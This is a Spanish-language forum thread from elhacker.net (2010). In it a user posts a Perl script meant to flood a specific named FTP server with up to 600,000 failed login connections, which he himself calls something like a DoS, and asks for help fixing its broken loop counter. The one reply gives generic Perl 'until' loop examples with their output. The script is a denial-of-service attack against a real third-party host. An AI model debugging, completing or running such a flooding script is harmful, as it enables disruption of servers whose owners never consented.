elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Rompecabezas de Bitcoin, Medio millón USD en premios


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  Ftp en perl !
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Ftp en perl !  (Leído 2,696 veces)
PHAMTOM

Desconectado Desconectado

Mensajes: 83

0x8B,0xEC,0x33,0xFF


Ver Perfil
Ftp en perl !
« en: 8 Marzo 2010, 21:38 pm »

Buenas,estaba escribiendo un programa , para un ftp que es vulnerable a multriples conexiones fallidas, pero no me funciona muy bien , aca esta el codigo , aver si podeis encontrar el error

Código:
#Logo
print q(
Flood ftp
);
use Net::FTP;
#Create user and pass
my $contador=0;
my $userpass="AAAAAA";
do
{
print("Intentos : $contador");
$userpass x 1;
$contador++;
my $ftp = Net::FTP->new("ftp.jamaikamu.com") or die("No se pudo conectar al servidor: $!");
$ftp->login($userpass,$userpass);
print("Login incorrecto");
#ACCIONES QUE QUEREMOS EJECUTAR EN EL SERVIDOR
$ftp->quit or die("No se puedo desconectar del servidor: $!");
print("Intentos : $contador");
} until($contador > 600000);

Supuestamente,esto tendria que conectarse al ftp ftp.jamaikamu.com , multriples veces , con un password fallido , que va a ser el $userpass .

No me anda ni el contador, asique no sé,estare haciendo todo mal,antes de seguir mentiendo mano. :)
es algo parecido a un D.o.S


En línea

Miran a cualquier ventana, mientras su pánico emana
y nubla su visión mi calma es pura precisión
cargo munición y miro tranquilo
ya ni respiro desde al ático os vigilo sigo al filo os tengo a tiro!

La kitchner quiere tanto a los pobres,que cada vez,tiene más
~ Yoya ~
Wiki

Desconectado Desconectado

Mensajes: 1.125



Ver Perfil
Re: Ftp en perl !
« Respuesta #1 en: 8 Marzo 2010, 22:00 pm »

Te recomiendo que primero lo maquetees para que conozca como funciona el modificador until, aunque yo prefería usar for xD.

Ejemplo de until para incrementar:

Código
  1. #!/user/bin/perl
  2.  
  3. #Ejemplo de until
  4.  
  5. my $username = 'hola';
  6. my $password = 'adios';
  7. until($i > 10){
  8. $i++;
  9. $password .=$i;
  10. $login = $username.$password;
  11. print $login, "\n";
  12. }

Salida:
Código:
yoya@yoya-desktop:~/Escritorio$ perl a.pl
holaadios1
holaadios12
holaadios123
holaadios1234
holaadios12345
holaadios123456
holaadios1234567
holaadios12345678
holaadios123456789
holaadios12345678910
holaadios1234567891011

O tambien se puede usar para ejecutar lo que esta dentro del modificador las veces que se indique.
Código
  1. #!/user/bin/perl
  2.  
  3. #Ejemplo de until
  4.  
  5. my $username = 'hola';
  6. my $password = 'adios';
  7. until($i > 10){
  8. $i++;
  9. $login = $username.$password;
  10. print $login, "\n";
  11. }
  12. print "Estoy fuera del modificador y no me afecta\n";
  13.  

Salida:
Código:
yoya@yoya-desktop:~/Escritorio$ perl a.pl
holaadios
holaadios
holaadios
holaadios
holaadios
holaadios
holaadios
holaadios
holaadios
holaadios
holaadios
Estoy fuera del modificador y no me afecta
yoya@yoya-desktop:~/Escritorio$


Ya con esto sabrás como se hace xD.


En línea

Mi madre me dijo que estoy destinado a ser pobre toda la vida.
Engineering is the art of balancing the benefits and drawbacks of any approach.
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Perl v5.38
Scripting
explorer 0 1,904 Último mensaje 4 Agosto 2023, 03:47 am
por explorer
De Perl a C
Programación C/C++
krootca 8 15,434 Último mensaje 9 Septiembre 2023, 12:50 pm
por MAFUS
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines